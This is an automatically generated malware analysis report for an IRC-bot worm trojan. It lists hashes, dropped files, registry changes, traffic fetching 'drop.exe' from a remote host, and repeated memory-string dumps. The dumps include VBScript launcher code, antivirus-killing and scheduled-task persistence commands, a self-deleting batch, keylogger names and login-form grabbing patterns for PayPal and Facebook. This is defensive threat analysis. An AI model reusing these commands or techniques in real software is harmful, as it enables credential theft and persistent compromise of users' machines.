Gen.Variant.Jaik.6139_8e5ce7cd70

by malwarelabrobot on March 13th, 2015 in Malware Descriptions.

Trojan.Win32.IRCbot.fjj (Kaspersky), Gen:Variant.Jaik.6139 (B) (Emsisoft), Gen:Variant.Jaik.6139 (AdAware), mzpefinder_pcap_file.YR, GenericAutorunWorm.YR, GenericIRCBot.YR (Lavasoft MAS)
Behaviour: Trojan, Worm, WormAutorun, IRCBot


The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.

Requires JavaScript enabled!

Summary
Dynamic Analysis
Static Analysis
Network Activity
Map
Strings from Dumps
Removals

MD5: 8e5ce7cd7044daa39916686cd403b95f
SHA1: f69321c4a99ac0401cfd34787842b5b7111bed5a
SHA256: 2374e6d9757f0081da79863ddb7167a0780d7c88285eceaa41085b36f23e4cd8
SSDeep: 49152:IfudTKzlmSzFWS 1sxgXDN4k92d97kiaKGejYcILoGDI1n:PdmzD NBYdffhGc1n
Size: 1780319 bytes
File type: EXE
Platform: WIN32
Entropy: Packed
PEID: UPolyXv05_v6, MicrosoftVisualC, MicrosoftVisualCv50v60MFC, MicrosoftVisualC50, Armadillov171
Company: PC Utilities Software Limited
Created at: 2005-08-07 21:04:00
Analyzed on: WindowsXP SP3 32-bit


Summary:

Trojan. A program that appears to do one thing but actually does another (a.k.a. Trojan Horse).

Payload

Behaviour Description
WormAutorun A worm can spread via removable drives. It writes its executable and creates "autorun.inf" scripts on all removable drives. The autorun script will execute the Trojan's file once a user opens a drive's folder in Windows Explorer.
IRCBot A bot can communicate with command and control servers via IRC channel.


Process activity

The Trojan creates the following process(es):

cCtWRS.exe:1936
lssis.exe:492
SdJshk.exe:1584
%original file name%.exe:1772

The Trojan injects its code into the following process(es):

Svchost.exe:336
Svchost.exe:1924
Svchost.exe:1632
Svchost.exe:1456

Mutexes

The following mutexes were created/opened:
No objects were found.

File activity

The process cCtWRS.exe:1936 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\Svchost.exe (14 bytes)

The process lssis.exe:492 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\aut7.tmp (196 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\TsTEFE.txt (3651 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\fLBYTh (2161 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\aut4.tmp (3057 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\aut5.tmp (3057 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\SdJshk.exe (10322 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\aut6.tmp (2145 bytes)

The Trojan deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\aut7.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\TsTEFE.txt (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\fLBYTh (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\aut4.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\aut5.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\aut6.tmp (0 bytes)

The process SdJshk.exe:1584 makes changes in the file system.
The Trojan deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\Svchost.exe (0 bytes)

The process %original file name%.exe:1772 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\QjlCDo (2161 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\EqEhol.txt (27193 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\aut3.tmp (196 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\aut1.tmp (3057 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\cCtWRS.exe (5161 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\aut2.tmp (9845 bytes)

The Trojan deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\aut1.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\EqEhol.txt (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\QjlCDo (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\aut2.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\aut3.tmp (0 bytes)

Registry activity

The process cCtWRS.exe:1936 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "E2 9B B7 2E AE BA 04 AF 60 B1 79 FB BA FE A2 9F"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

The process lssis.exe:492 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "8A 7E FE 7D 44 00 59 82 73 48 07 8A E8 4A B0 07"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

The process SdJshk.exe:1584 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "18 DC 14 34 AB AA 5C 79 C0 8C F9 95 C2 31 CB 54"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

The process %original file name%.exe:1772 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "52 D2 CC 07 92 B3 D7 4A C7 F5 50 36 93 19 29 9A"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

Dropped PE files

MD5 File path
01d151ccd2a75bd713b8ce81d6509eb8 c:\Documents and Settings\"%CurrentUserName%"\Application Data\qjlcdo\cCtWRS.exe
01d151ccd2a75bd713b8ce81d6509eb8 c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\SdJshk.exe
27c6d03bcdb8cfeb96b716f3d8be3e18 c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\Svchost.exe
01d151ccd2a75bd713b8ce81d6509eb8 c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\cCtWRS.exe
27c6d03bcdb8cfeb96b716f3d8be3e18 c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\explorer.exe
b3a0353a33887b610f17bb45c4e66957 c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\lssis.exe
b3a0353a33887b610f17bb45c4e66957 c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temporary Internet Files\Content.IE5\SQ1JWKKG\drop[1].exe

HOSTS file anomalies

No changes have been detected.

Rootkit activity

No anomalies have been detected.

Propagation

A worm can spread via removable drives. It writes its executable and creates "autorun.inf" scripts on all removable drives. The autorun script will execute the Trojan's file once a user opens a drive's folder in Windows Explorer.

VersionInfo

Company Name:
Product Name:
Product Version:
Legal Copyright:
Legal Trademarks:
Original Filename:
Internal Name:
File Version: 3, 1, 1, 0
File Description:
Comments: http://www.autoitscript.com/autoit3/compiled.html
Language: English (United States)

PE Sections

Name Virtual Address Virtual Size Raw Size Entropy Section MD5
.text 4096 204454 204800 4.55587 58bf3c8238b3c5239b25ea2302dcd100
.rdata 208896 1804 2048 3.37209 577231055c37e031753652983a86fd15
.data 212992 93572 25088 2.54875 305b8ae7a143f90bb086012020d297d1
.idata 307200 8964 9216 3.84806 f720fa2e1d81f3c8880c453242cd9abd
.rsrc 319488 24576 23552 1.68417 dfd83b9b5a45cc2aa9ee380e93b46181

Dropped from:

Downloaded by:

Similar by SSDeep:

Similar by Lavasoft Polymorphic Checker:

URLs

URL IP
hxxp://gonjeh.com/drop.exe 96.44.154.75
notorious.systems 209.123.52.34
www.dropbox.com 108.160.166.142


IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)

ET TROJAN Likely Bot Nick in IRC (USA ..)
ET CURRENT_EVENTS SUSPICIOUS IRC - NICK and 3 Letter Country Code
ET CHAT IRC PRIVMSG command
ET CHAT IRC JOIN command
ET CHAT IRC NICK command
ET CHAT IRC USER command
ET CHAT IRC authorization message

Traffic

GET /drop.exe HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: gonjeh.com
Connection: Keep-Alive


HTTP/1.1 200 OK
Server: nginx
Date: Thu, 12 Mar 2015 02:44:14 GMT
Content-Type: application/octet-stream
Content-Length: 757641
Last-Modified: Wed, 11 Mar 2015 20:15:20 GMT
Connection: keep-alive
ETag: "5500a258-b8f89"
Expires: Sat, 11 Apr 2015 02:44:14 GMT
Cache-Control: max-age=2592000
Accept-Ranges: bytes
MZ......................@.............................................
..!..L.!This program cannot be run in DOS mode....$...................
............k.........................................................
....../.......Rich............................PE..L....M.B............
..... ...................0....@.......................... ............
...............................................@......................
....................................................p...X.............
...............text............ .................. ..`.rdata.......0..
.....$..............@[email protected][email protected]...,[email protected]
...#[email protected][email protected]..................
@..@..................................................................
......................................................................
......................................................................
......................................................................
............................................Vj...XP.f...F...}..... .Y.
.^.V...t$..w~...F....$.P.F..`}...t$...P.j}.......^....D$.V...F....$.P.
F..3}..... .Y..^...VW.|$....G..F....$.P.F...}.....7P..}......._^....T$
...|.;Q.}........A.......D$...|.;A.}.........A.........VW.|$...;.t3.G.
.F.@9F.}..6..~...F....$.P.F...|..Y..Y.7.6..|..YY.._^...V...t$..q}...F.
@9F.Y}..6..}...F....$.P.F..I|..Y..Y.t$..6.P|..Y..Y^...V...~..}..6..}..
j..F.......|..Y..Y...L$..F..........`....^...U.....S.].V..;.u..E.VP...
..P........u..K}...B.C..F..F..H.9N.}'.D..W$.P.F...{...6..W..{...6.
<<< skipped >>>

The Trojan connects to the servers at the folowing location(s):

Svchost.exe_336:

`.rsrc
/%Di>
QsD.Os\
on error resume next:Set oShell = WScript.CreateObject ("WScript.Shell"):oShell.run "cmd.exe /C CD /D " & chr(34) & replace(
WScript.ScriptFullName,
WScript.ScriptName, "" ) & chr(34) & " && INTERPRETER.exe STB",vbhide
%Program Files% (x86)\Microsoft Visual Studio\VB98\VB6.OLB
kernel32.dll
psapi.dll
MSVBVM60.dll
ntdll.dll
user32.dll
urlmon
URLDownloadToFileA
advapi32.dll
shell32.dll
ShellExecuteA
RegOpenKeyExA
RegCloseKey
FindExecutableA
VBA6.DLL
MasterKey
~&.Iu
.iI)'d
RV[.im
v.xWP
Mi%u{-7
.iJOY%
E.kkg
BT3 i%d
9u%xE;o
]JmSGxu_
.Im{y-
6-cKxv}
]-ukC}
?.kYV
7-Svo}{
.SJ}~_
.Vk(na
h.bI&
q*-.yZ
-msgm
x}.tsym
2%UKy?
o.Rkdy"
.gGZm
.Xzmi-Zz
;/%S|
w.QI6
j%.Wk
3].WV
.text
`.data
.rsrc
MSVBVM60.DLL
0|0|0|0|0|0|0|0|0|0|0|0|0|0|0|0|0|0|0|0|0|0|0|0|0|0|0|0|0|0|0|0|0|0|0|0|0|0|0|0|0|0|0||1|0|0||PA0|0|0|0|0|0|0|0|0|0|0|0|0|0|0|PAhXXp://VVV.host.com/path/yourfile.exe|1|6199Microsoft Error|Microsoft Error|32|6199PcCtWRS.exe|EqEhol.txt|RYWNaI.exe|QjlCDo|
KERNEL32.DLL
NIS.exe
\Norton Internet Security\Engine\21.1.0.18\NIS.exe
egui.exe
\ESET\ESET NOD32 Antivirus\ecls.exe
avp.exe
\svchost.exe
bdagent.exe
\Bitdefender\Bitdefender 2015\certutil.exe
Avastui.exe
\AVAST Software\Avast\VisthAux.exe
\SysWOW64\svchost.exe
\System32\svchost.exe
cmd /c taskkill /F /pid
\net.exe
\se.exe
\file.txt
SELECT * FROM Win32_OperatingSystem
INTERPRETER.exe
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\
wscript.shell
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\
schtasks /create /sc minute /mo 1 /tn WindowsUpdate
schtasks /delete /tn WindowsUpdate
cmd /c icacls
/deny %username%:F
\test.exe
\SkypeUpdates\skype.exe
media.exe
WScript.Shell
hXXps://twitter.com
SendKeys
hXXp://VVV.facebook.com
cmd.exe
C:\Windows\system32\cmd.exe
&& ping 127.0.0.1 && exit
consent.exe
athenahttpbotnet
VVV.update.microsoft.com
POST /%s HTTP/1
compatible; MSIE 7.0; Windows NT 5.1; SV1)
MapVirtualKeyA
SOFTWARE\Microsoft\Active Setup\Installed Components\%s
RegCreateKeyExA
\system\systwin32.exe
DownloadAndExecute
javaw.exe
GetKeyboardType
InternetOpenUrlA
PR_OpenTCPSocket
GdiplusShutdown
ole32.dll
HTTP/1.1
UnitKeylogger
GetKeyboardLayoutNameA
C:\Windows\tracing
C:\ProgramData\Microsoft\Network\Connections\Pbk
*facebook.*/login.php*
*login.live.*/*post.srf*
*paypal.*/webscr?cmd=_login-submit*
application/x-www-form-urlencoded
Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/32.0.1700.76 Safari/537.36
%WinDir%\SysWOW64\svchost.exe
Content-Length: %d
Keylogger
CryptDllConvertPublicKeyInfo
CryptDllEncodePublicKeyAndParameters
REG add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoRun
KeyHook
KeyboardHookDelegate
[BypassScreening]
HuntHTTPDownload
Webcam
Mozilla Firefox
TcpClient
KeyTLIST=b03
You need a registered nick to join that channel
flood.anope
InternetOpenUrlW
hXXp://VVV.gofuckbiz.com/
hXXp://kremlin.ru/
Opera/7.60 (Windows NT 5.2; U) [en] (IBM EVV/3.0/EAK01AG9/LE)
.fldr
cmd /c taskkill /F /PID
shell32.dll, 3
Scripting.FileSystemObject
autorun.inf
shell32.dll, 2
Icon=%SystemRoot%\system32\SHELL32.dll,7
shell32.dll, 0
\explorer.exe
Kernel32.dll
SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System
\skype.exe
Project1.exe
\1.txt
\2.txt
Project1xp.exe

Svchost.exe_336_rwx_00400000_00122000:

`.rsrc
/%Di>
QsD.Os\
on error resume next:Set oShell = WScript.CreateObject ("WScript.Shell"):oShell.run "cmd.exe /C CD /D " & chr(34) & replace(
WScript.ScriptFullName,
WScript.ScriptName, "" ) & chr(34) & " && INTERPRETER.exe STB",vbhide
%Program Files% (x86)\Microsoft Visual Studio\VB98\VB6.OLB
kernel32.dll
psapi.dll
MSVBVM60.dll
ntdll.dll
user32.dll
urlmon
URLDownloadToFileA
advapi32.dll
shell32.dll
ShellExecuteA
RegOpenKeyExA
RegCloseKey
FindExecutableA
VBA6.DLL
MasterKey
~&.Iu
.iI)'d
RV[.im
v.xWP
Mi%u{-7
.iJOY%
E.kkg
BT3 i%d
9u%xE;o
]JmSGxu_
.Im{y-
6-cKxv}
]-ukC}
?.kYV
7-Svo}{
.SJ}~_
.Vk(na
h.bI&
q*-.yZ
-msgm
x}.tsym
2%UKy?
o.Rkdy"
.gGZm
.Xzmi-Zz
;/%S|
w.QI6
j%.Wk
3].WV
.text
`.data
.rsrc
MSVBVM60.DLL
0|0|0|0|0|0|0|0|0|0|0|0|0|0|0|0|0|0|0|0|0|0|0|0|0|0|0|0|0|0|0|0|0|0|0|0|0|0|0|0|0|0|0||1|0|0||PA0|0|0|0|0|0|0|0|0|0|0|0|0|0|0|PAhXXp://VVV.host.com/path/yourfile.exe|1|6199Microsoft Error|Microsoft Error|32|6199PcCtWRS.exe|EqEhol.txt|RYWNaI.exe|QjlCDo|
KERNEL32.DLL
NIS.exe
\Norton Internet Security\Engine\21.1.0.18\NIS.exe
egui.exe
\ESET\ESET NOD32 Antivirus\ecls.exe
avp.exe
\svchost.exe
bdagent.exe
\Bitdefender\Bitdefender 2015\certutil.exe
Avastui.exe
\AVAST Software\Avast\VisthAux.exe
\SysWOW64\svchost.exe
\System32\svchost.exe
cmd /c taskkill /F /pid
\net.exe
\se.exe
\file.txt
SELECT * FROM Win32_OperatingSystem
INTERPRETER.exe
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\
wscript.shell
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\
schtasks /create /sc minute /mo 1 /tn WindowsUpdate
schtasks /delete /tn WindowsUpdate
cmd /c icacls
/deny %username%:F
\test.exe
\SkypeUpdates\skype.exe
media.exe
WScript.Shell
hXXps://twitter.com
SendKeys
hXXp://VVV.facebook.com
cmd.exe
C:\Windows\system32\cmd.exe
&& ping 127.0.0.1 && exit
consent.exe
athenahttpbotnet
VVV.update.microsoft.com
POST /%s HTTP/1
compatible; MSIE 7.0; Windows NT 5.1; SV1)
MapVirtualKeyA
SOFTWARE\Microsoft\Active Setup\Installed Components\%s
RegCreateKeyExA
\system\systwin32.exe
DownloadAndExecute
javaw.exe
GetKeyboardType
InternetOpenUrlA
PR_OpenTCPSocket
GdiplusShutdown
ole32.dll
HTTP/1.1
UnitKeylogger
GetKeyboardLayoutNameA
C:\Windows\tracing
C:\ProgramData\Microsoft\Network\Connections\Pbk
*facebook.*/login.php*
*login.live.*/*post.srf*
*paypal.*/webscr?cmd=_login-submit*
application/x-www-form-urlencoded
Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/32.0.1700.76 Safari/537.36
%WinDir%\SysWOW64\svchost.exe
Content-Length: %d
Keylogger
CryptDllConvertPublicKeyInfo
CryptDllEncodePublicKeyAndParameters
REG add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoRun
KeyHook
KeyboardHookDelegate
[BypassScreening]
HuntHTTPDownload
Webcam
Mozilla Firefox
TcpClient
KeyTLIST=b03
You need a registered nick to join that channel
flood.anope
InternetOpenUrlW
hXXp://VVV.gofuckbiz.com/
hXXp://kremlin.ru/
Opera/7.60 (Windows NT 5.2; U) [en] (IBM EVV/3.0/EAK01AG9/LE)
.fldr
cmd /c taskkill /F /PID
shell32.dll, 3
Scripting.FileSystemObject
autorun.inf
shell32.dll, 2
Icon=%SystemRoot%\system32\SHELL32.dll,7
shell32.dll, 0
\explorer.exe
Kernel32.dll
SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System
\skype.exe
Project1.exe
\1.txt
\2.txt
Project1xp.exe

Svchost.exe_1924:

`.rsrc
SSShD
j.Yf;
_tcPVj@
.PjRW
%s\%s
%s\removeMe%i%i%i%i.bat
del "%s">nul
ping 1.1.1.1 -w 5000 >nul
if exist "%s" goto Repeat
%s %s
%s %s "" "lol" :%s
%s %s %s
%s %s :%s
%s :%s
File downloaded and executed.
File downloaded, but execution failed.
File downloaded.Updating...
Software\Microsoft\Windows\CurrentVersion\Run\
%s:*:Enabled:%s
SOFTWARE\Microsoft\Windows\CurrentVersion\Run\
function not supported
operation canceled
address_family_not_supported
operation_in_progress
operation_not_supported
protocol_not_supported
operation_would_block
address family not supported
broken pipe
inappropriate io control operation
not supported
operation in progress
operation not permitted
operation not supported
operation would block
protocol not supported
operator
GetProcessWindowStation
NICK
JOIN
PRIVMSG
4353453533
join
Microsoft Windows Hosting Service Login
explorer.exe
4.4.2
zcÁ
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\Svchost.exe
GetWindowsDirectoryA
GetCPInfo
GetProcessHeap
RegCreateKeyExA
RegCloseKey
ShellExecuteA
URLDownloadToFileA
.text
`.rdata
@.data
.rsrc
[A%DtB
KeyE
URLW
<requestedExecutionLevel level='asInvoker' uiAccess='false' />
KERNEL32.DLL
ADVAPI32.dll
SHELL32.dll
SHLWAPI.dll
urlmon.dll
WS2_32.dll
kernel32.dll
mscoree.dll
- floating point support not loaded
- CRT not initialized
- Attempt to initialize the CRT more than once.
USER32.DLL
portuguese-brazilian

Svchost.exe_1924_rwx_00400000_0002F000:

`.rsrc
SSShD
j.Yf;
_tcPVj@
.PjRW
%s\%s
%s\removeMe%i%i%i%i.bat
del "%s">nul
ping 1.1.1.1 -w 5000 >nul
if exist "%s" goto Repeat
%s %s
%s %s "" "lol" :%s
%s %s %s
%s %s :%s
%s :%s
File downloaded and executed.
File downloaded, but execution failed.
File downloaded.Updating...
Software\Microsoft\Windows\CurrentVersion\Run\
%s:*:Enabled:%s
SOFTWARE\Microsoft\Windows\CurrentVersion\Run\
function not supported
operation canceled
address_family_not_supported
operation_in_progress
operation_not_supported
protocol_not_supported
operation_would_block
address family not supported
broken pipe
inappropriate io control operation
not supported
operation in progress
operation not permitted
operation not supported
operation would block
protocol not supported
operator
GetProcessWindowStation
NICK
JOIN
PRIVMSG
4353453533
join
Microsoft Windows Hosting Service Login
explorer.exe
4.4.2
zcÁ
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\Svchost.exe
GetWindowsDirectoryA
GetCPInfo
GetProcessHeap
RegCreateKeyExA
RegCloseKey
ShellExecuteA
URLDownloadToFileA
.text
`.rdata
@.data
.rsrc
[A%DtB
KeyE
URLW
<requestedExecutionLevel level='asInvoker' uiAccess='false' />
KERNEL32.DLL
ADVAPI32.dll
SHELL32.dll
SHLWAPI.dll
urlmon.dll
WS2_32.dll
kernel32.dll
mscoree.dll
- floating point support not loaded
- CRT not initialized
- Attempt to initialize the CRT more than once.
USER32.DLL
portuguese-brazilian

Svchost.exe_1632:

`.rsrc
QsD.Os\
on error resume next:Set oShell = WScript.CreateObject ("WScript.Shell"):oShell.run "cmd.exe /C CD /D " & chr(34) & replace(
WScript.ScriptFullName,
WScript.ScriptName, "" ) & chr(34) & " && INTERPRETER.exe STB",vbhide
%Program Files% (x86)\Microsoft Visual Studio\VB98\VB6.OLB
kernel32.dll
psapi.dll
MSVBVM60.dll
ntdll.dll
user32.dll
urlmon
URLDownloadToFileA
advapi32.dll
shell32.dll
ShellExecuteA
RegOpenKeyExA
RegCloseKey
FindExecutableA
VBA6.DLL
MasterKey
.text
`.data
.rsrc
MSVBVM60.DLL
0|0|0|0|0|0|0|0|0|0|0|0|0|0|0|0|0|0|0|0|0|0|0|0|0|0|0|0|0|0|0|0|0|0|0|0|0|0|0|0|0|0|0||1|0|0||PA0|0|0|0|0|0|0|0|0|0|0|0|0|0|0|PAhXXp://VVV.host.com/path/yourfile.exe|1|6125Microsoft Error|Microsoft Error|32|6125PSdJshk.exe|TsTEFE.txt|HAljqB.exe|fLBYTh|
KERNEL32.DLL
NIS.exe
\Norton Internet Security\Engine\21.1.0.18\NIS.exe
egui.exe
\ESET\ESET NOD32 Antivirus\ecls.exe
avp.exe
\svchost.exe
bdagent.exe
\Bitdefender\Bitdefender 2015\certutil.exe
Avastui.exe
\AVAST Software\Avast\VisthAux.exe
\SysWOW64\svchost.exe
\System32\svchost.exe
cmd /c taskkill /F /pid
\net.exe
\se.exe
\file.txt
SELECT * FROM Win32_OperatingSystem
INTERPRETER.exe
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\
wscript.shell
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\
schtasks /create /sc minute /mo 1 /tn WindowsUpdate
schtasks /delete /tn WindowsUpdate
cmd /c icacls
/deny %username%:F
\test.exe
\SkypeUpdates\skype.exe
media.exe
WScript.Shell
hXXps://twitter.com
SendKeys
hXXp://VVV.facebook.com
cmd.exe
C:\Windows\system32\cmd.exe
&& ping 127.0.0.1 && exit
consent.exe
athenahttpbotnet
VVV.update.microsoft.com
POST /%s HTTP/1
compatible; MSIE 7.0; Windows NT 5.1; SV1)
MapVirtualKeyA
SOFTWARE\Microsoft\Active Setup\Installed Components\%s
RegCreateKeyExA
\system\systwin32.exe
DownloadAndExecute
javaw.exe
GetKeyboardType
InternetOpenUrlA
PR_OpenTCPSocket
GdiplusShutdown
ole32.dll
HTTP/1.1
UnitKeylogger
GetKeyboardLayoutNameA
C:\Windows\tracing
C:\ProgramData\Microsoft\Network\Connections\Pbk
*facebook.*/login.php*
*login.live.*/*post.srf*
*paypal.*/webscr?cmd=_login-submit*
application/x-www-form-urlencoded
Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/32.0.1700.76 Safari/537.36
%WinDir%\SysWOW64\svchost.exe
Content-Length: %d
Keylogger
CryptDllConvertPublicKeyInfo
CryptDllEncodePublicKeyAndParameters
REG add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoRun
KeyHook
KeyboardHookDelegate
[BypassScreening]
HuntHTTPDownload
Webcam
Mozilla Firefox
TcpClient
KeyTLIST=b03
You need a registered nick to join that channel
flood.anope
InternetOpenUrlW
hXXp://VVV.gofuckbiz.com/
hXXp://kremlin.ru/
Opera/7.60 (Windows NT 5.2; U) [en] (IBM EVV/3.0/EAK01AG9/LE)
.fldr
cmd /c taskkill /F /PID
shell32.dll, 3
Scripting.FileSystemObject
autorun.inf
shell32.dll, 2
Icon=%SystemRoot%\system32\SHELL32.dll,7
shell32.dll, 0
\explorer.exe
Kernel32.dll
SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System
\skype.exe
Project1.exe
\1.txt
\2.txt
Project1xp.exe

Svchost.exe_1632_rwx_00400000_00063000:

`.rsrc
QsD.Os\
on error resume next:Set oShell = WScript.CreateObject ("WScript.Shell"):oShell.run "cmd.exe /C CD /D " & chr(34) & replace(
WScript.ScriptFullName,
WScript.ScriptName, "" ) & chr(34) & " && INTERPRETER.exe STB",vbhide
%Program Files% (x86)\Microsoft Visual Studio\VB98\VB6.OLB
kernel32.dll
psapi.dll
MSVBVM60.dll
ntdll.dll
user32.dll
urlmon
URLDownloadToFileA
advapi32.dll
shell32.dll
ShellExecuteA
RegOpenKeyExA
RegCloseKey
FindExecutableA
VBA6.DLL
MasterKey
.text
`.data
.rsrc
MSVBVM60.DLL
0|0|0|0|0|0|0|0|0|0|0|0|0|0|0|0|0|0|0|0|0|0|0|0|0|0|0|0|0|0|0|0|0|0|0|0|0|0|0|0|0|0|0||1|0|0||PA0|0|0|0|0|0|0|0|0|0|0|0|0|0|0|PAhXXp://VVV.host.com/path/yourfile.exe|1|6125Microsoft Error|Microsoft Error|32|6125PSdJshk.exe|TsTEFE.txt|HAljqB.exe|fLBYTh|
KERNEL32.DLL
NIS.exe
\Norton Internet Security\Engine\21.1.0.18\NIS.exe
egui.exe
\ESET\ESET NOD32 Antivirus\ecls.exe
avp.exe
\svchost.exe
bdagent.exe
\Bitdefender\Bitdefender 2015\certutil.exe
Avastui.exe
\AVAST Software\Avast\VisthAux.exe
\SysWOW64\svchost.exe
\System32\svchost.exe
cmd /c taskkill /F /pid
\net.exe
\se.exe
\file.txt
SELECT * FROM Win32_OperatingSystem
INTERPRETER.exe
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\
wscript.shell
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\
schtasks /create /sc minute /mo 1 /tn WindowsUpdate
schtasks /delete /tn WindowsUpdate
cmd /c icacls
/deny %username%:F
\test.exe
\SkypeUpdates\skype.exe
media.exe
WScript.Shell
hXXps://twitter.com
SendKeys
hXXp://VVV.facebook.com
cmd.exe
C:\Windows\system32\cmd.exe
&& ping 127.0.0.1 && exit
consent.exe
athenahttpbotnet
VVV.update.microsoft.com
POST /%s HTTP/1
compatible; MSIE 7.0; Windows NT 5.1; SV1)
MapVirtualKeyA
